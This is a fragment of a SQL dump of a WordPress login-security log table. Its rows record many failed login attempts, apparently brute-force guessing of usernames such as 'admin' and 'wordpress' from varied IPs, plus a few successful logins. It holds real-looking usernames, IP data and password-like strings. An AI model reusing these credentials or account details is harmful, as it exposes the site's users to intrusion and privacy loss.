(9422, 33197, 1694837303.320804, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ*r«©', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Edg/88.0.705.74'),
(9423, 33198, 1694837312.584777, 1, 'loginFailInvalidUsername', '3ddaaade350b269e!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgGÃ¹', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46'),
(9424, 33199, 1694837316.045810, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgh|', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Edg/88.0.705.74'),
(9425, 33200, 1694837320.467438, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´òéN', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.136 Safari/537.36'),
(9825, 41960, 1701345763.759352, 0, 'loginOK', 'mkhrimas', 1, '\0\0\0\0\0\0\0\0\0\0ÿÿ3ÛX°', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36'),
(9826, 41963, 1701347069.100602, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÑ.c', 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9827, 42038, 1701351573.396569, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-=¹Š', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),
(9828, 42039, 1701352061.797721, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½þ', 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9829, 42050, 1701354203.160758, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½À', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53'),
(9830, 42051, 1701354688.832576, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb:M', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(9833, 42059, 1701357337.006926, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÆb>Ú', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14'),
(9832, 42058, 1701356852.485346, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½Q', 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0'),
(9831, 42053, 1701355165.435141, 1, 'loginFailInvalidUsername', 'plusechaptyrs', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿk½', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),
(10316, 50827, 1712000957.059848, 1, 'loginFailInvalidUsername', 'mattcarter', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿD·¼­', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(10315, 50826, 1712000954.186833, 1, 'loginFailInvalidUsername', 'mattcarter', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿD·¼­', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(10314, 50825, 1712000951.379686, 1, 'loginFailInvalidUsername', 'mattcarter', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿD·¼­', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),
(10323, 51066, 1712318785.552734, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ16Ï', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10322, 51064, 1712318756.468230, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÂâæ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10321, 51063, 1712318733.976838, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ^@ùÛ', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10319, 51059, 1712318633.388912, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿVxá', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(10320, 51061, 1712318692.059465, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ°Í8Ë', 'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(9265, 33030, 1694685254.083470, 1, 'loginFailInvalidUsername', 'happythinking@verizon.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgwR', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9264, 33029, 1694685246.711209, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ°-²¼', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9263, 33028, 1694685246.554989, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ*qL', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9262, 33027, 1694685224.721661, 1, 'loginFailInvalidUsername', 'happythinking@verizon.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg”Î', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),
(9261, 33026, 1694685217.106332, 1, 'loginFailInvalidUsername', 'admin@happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿñaœ', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9245, 33010, 1694685126.987092, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ·Qž', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9244, 33009, 1694685122.032499, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ °Æá', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9243, 33008, 1694685116.210432, 1, 'loginFailInvalidUsername', 'username', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿßÌ3¢', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9242, 33007, 1694685111.080551, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg¤Ó·', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63'),
(9241, 33006, 1694685107.237238, 1, 'loginFailInvalidUsername', 'admin@happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$K&m', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Edg/84.0.522.63'),
(9240, 33005, 1694685100.247140, 1, 'loginFailInvalidUsername', 'study*20123', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿµ¼ƒ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(9239, 33004, 1694685096.407743, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)ä¥v', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063');
INSERT INTO `wpou_wflogins` VALUES
(9238, 33004, 1694685096.393506, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)ä¥v', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(9237, 33003, 1694685092.189277, 1, 'loginFailInvalidUsername', 'happythinking@yahoo.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¹|—y', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9236, 33002, 1694685086.875563, 1, 'loginFailInvalidUsername', 'happythinking@hanmail.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿo\\q', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15'),
(9235, 33001, 1694685083.428192, 1, 'loginFailInvalidUsername', '3ddaaade350b269e123', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1+úT', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9234, 33001, 1694685083.418093, 1, 'loginFailInvalidUsername', '3ddaaade350b269e123', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1+úT', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0'),
(9233, 33000, 1694685078.636833, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgÔ¹!', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063'),
(9232, 32999, 1694685074.009599, 1, 'loginFailInvalidUsername', 'bluesky1211234!123!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´·ú+', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),
(9231, 32998, 1694685070.265915, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1++Þ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9230, 32998, 1694685070.251854, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ1++Þ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),
(9229, 32997, 1694685064.925662, 1, 'loginFailInvalidUsername', 'username', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‹@<', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9228, 32996, 1694685057.726307, 1, 'loginFailInvalidUsername', 'happythinking@verizon.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿœ&3Å', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9227, 32995, 1694685053.800443, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¼=ê', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),
(9226, 32994, 1694685050.406137, 1, 'loginFailInvalidUsername', 'happythinking@verizon.net', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´ò×=', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9225, 32993, 1694685042.708579, 1, 'loginFailInvalidUsername', 'study*20!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ«êë', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36'),
(9224, 32992, 1694685038.877060, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÊ­}³', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9223, 32991, 1694685035.524639, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg¯	Ö', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36'),
(9222, 32990, 1694685030.234771, 1, 'loginFailInvalidUsername', 'chloe18123!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¯í', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36'),
(9053, 32375, 1694031245.731162, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÈi×', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9052, 32374, 1694031244.180628, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÅ4–—', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(9051, 32373, 1694031238.723858, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÊ;Y|', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8832, 31629, 1692901830.258636, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿi`2Ý', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8831, 31628, 1692901822.788469, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ*rÌ?', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8830, 31627, 1692901818.690341, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¿±¹;', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8829, 31626, 1692901815.460292, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ˜«Â', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8828, 31625, 1692901809.576006, 1, 'loginFailInvalidUsername', 'password!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ}Ô¬®', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8827, 31624, 1692901802.688978, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ$D	Õ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8826, 31623, 1692901798.752118, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ±÷nj', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8825, 31622, 1692901793.814392, 1, 'loginFailInvalidUsername', 'happythinking', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ î€‚', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8824, 31621, 1692901790.193288, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\¥™', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8823, 31621, 1692901790.181389, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\¥™', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8822, 31620, 1692901786.783767, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÄÛ‡¸', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8821, 31619, 1692901781.815184, 1, 'loginFailInvalidUsername', 'admin!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÞüÎƒ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8820, 31618, 1692901777.076536, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿu’“', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8819, 31617, 1692901772.085294, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ†1&', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8818, 31616, 1692901765.189460, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾HÝº', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8817, 31615, 1692901758.818200, 1, 'loginFailInvalidUsername', 'password', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÈ/''', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8816, 31614, 1692901753.692561, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ)ø§', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8960, 32084, 1693645726.512914, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz¡5', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8959, 32053, 1693618849.663614, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgNU', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8958, 32052, 1693618846.336657, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ\\½"', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8884, 31946, 1693353072.008631, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿv`Ð', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8883, 31945, 1693353065.226874, 1, 'loginFailInvalidUsername', 'happythinking!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ¾šsÓ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8882, 31944, 1693353061.984215, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ÷º', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8881, 31943, 1693353058.050579, 1, 'loginFailInvalidUsername', 'admin!', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgx¯+', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8880, 31942, 1693353050.647684, 1, 'loginFailInvalidUsername', '*ce4f703eebc8e3bf98e6f776506fb5151e666377', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÈ5&', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8879, 31942, 1693353050.637808, 1, 'loginFailInvalidUsername', '*ce4f703eebc8e3bf98e6f776506fb5151e666377', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÈ5&', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8878, 31941, 1693353046.865844, 1, 'loginFailInvalidUsername', 'wordpress', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿq§•?', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8877, 31940, 1693353042.876905, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ·Pˆ[', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8856, 31917, 1693331024.731538, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ€ÇöÞ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),
(8955, 32049, 1693618821.352261, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿiŸ{Ð', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8936, 32030, 1693618690.247686, 1, 'loginFailInvalidUsername', 'happythinking.howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´üv–', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8935, 32029, 1693618685.135734, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿÉ˜G', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8934, 32028, 1693618682.246649, 1, 'loginFailInvalidUsername', 'howequipmentworks.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´ññª', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8912, 31986, 1693531720.452690, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ«åI', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8911, 31985, 1693531716.882082, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿg™+ú', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8910, 31984, 1693531713.530206, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿvcR*', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8909, 31982, 1693521347.459986, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ-£’R', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8908, 31981, 1693521343.526132, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿgÖ½m', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8907, 31980, 1693521336.901569, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿN¼>ä', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8906, 31979, 1693521331.727645, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿwŸ–S', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8905, 31978, 1693521327.447596, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿz¹üò', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8904, 31977, 1693521322.811586, 1, 'loginFailInvalidUsername', 'happythinking.com', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ´·õ', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
(8900, 31970, 1693470115.495476, 1, 'loginFailInvalidUsername', 'admin', 0, '\0\0\0\0\0\0\0\0\0\0ÿÿ‚až', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),
